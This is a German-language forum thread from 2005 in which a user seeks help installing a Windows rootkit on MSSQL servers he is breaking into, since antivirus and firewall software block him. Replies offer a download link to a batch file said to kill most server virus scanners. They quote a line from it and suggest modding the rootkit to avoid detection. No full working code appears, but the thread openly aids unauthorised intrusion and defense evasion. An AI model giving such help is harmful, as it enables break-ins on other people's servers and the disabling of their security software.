winrootkit

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Disco, 5. August 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 5. August 2005
    ich habe das winrootkit doch leider habe ich ein problem immer wenn ich ein mssql server hax0rn will kann kann ich die datein net auf denn server scheiben weil das Av progz es verbieten watt soll ich machen kann die schiess FW+Av net mit kill.exe killen
     

  2. Anzeige
  3. #2 5. August 2005
    du solltest vlt. mal das rootkit modden
     
  4. #3 5. August 2005
    Also ich würds dir nich empfehlen weils sehr auffällig ist einfach mal den Virenscanner zu killen.

    Mit kill.exe wirste da wohl kein Erfolg haben, da brauchste sowas hier:
    [HIDE]http://rapidshare.de/files/3688064/blablablub_nur_fuer_raid-rush_und_so.rar.html[/HIDE]

    Die .bat killt die meisten Virenscanner die auf Servern üblich sind. Ich hab da jetzt die NetStop-Befehle rausgenommen, weils für deinen Fall ja nicht von Nöten sein sollte den AV komplett zu killen..


    Aber wiegesagt, es ist auffälig und wenn du es machst solltest du danach den Server neustarten.
     
  5. #4 6. August 2005
    mal ne farge wozu der vorletzte befehl?

    "echo done>>c:\done.txt"

    is doch en bissel auffällig wenn da auf einmal ne txt mit "done" drin steht im root ist!


    Gruss Sypher
     
  6. #5 6. August 2005
    heist eigentlich bye nich done, der sagt ftp server das du gehst...


    zum andren prob....die bat wird dir nix nützen die meisten avs lassen nich weder mit net sstop noch mit herkömmlichen killtols tricksen...
     
  7. #6 6. August 2005
    danke für die bat habe auch auch schon ne ander habe dein probiert aber bringt auch nix, ich muss die mit ein rootkit killen ander geht es net denke ich mal aber ich kriegt das rootkit net auf denn server weil dann acces denied kommt

    jo hast recht und wie soll ich es sonst machen fast alle server haben hut zutage av+fw
     
  8. #7 6. August 2005
    Du kannst sie ja wieder löschen oder den Befehl aus der .bat nehmen...
     
  9. #8 6. August 2005
    wie kann ich das scheiss rootkit so moden das die av nix merken???
     
  10. #9 6. August 2005
    hi,

    ne programmiersprache lernen und dir selber eins coden. das is besser, als alles andere.

    Mfg Halloweenracer
     
  11. #10 6. August 2005
    das hättest du dir auch sparen können, das bring mich net weiter ?(
     

  12. Videos zum Thema